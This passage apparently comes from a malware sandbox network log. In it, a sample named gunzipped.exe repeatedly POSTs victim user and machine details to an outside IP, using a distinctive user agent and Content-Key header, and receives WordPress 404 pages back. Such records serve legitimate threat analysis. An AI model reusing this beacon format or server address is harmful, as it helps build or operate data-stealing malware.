                          Apr 17, 2024 03:17:56.089061022 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:56.089098930 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:56.089139938 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:56.089178085 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:56.089221954 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          42192.168.2.549755136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:56.686681986 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:56.889962912 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:57.797519922 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:56 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:57.797590017 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:57.797631979 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:57.797671080 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:57.797712088 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:57.797749043 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:57.797787905 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:57.797826052 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:57.797863007 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:57.797904015 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          43192.168.2.549756136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:58.145128012 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:58.348887920 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:59.276449919 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:58 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:59.276508093 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:59.276546955 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:59.276582003 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:59.276618958 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:59.276654959 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:59.276695013 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:59.276731968 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:59.276768923 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
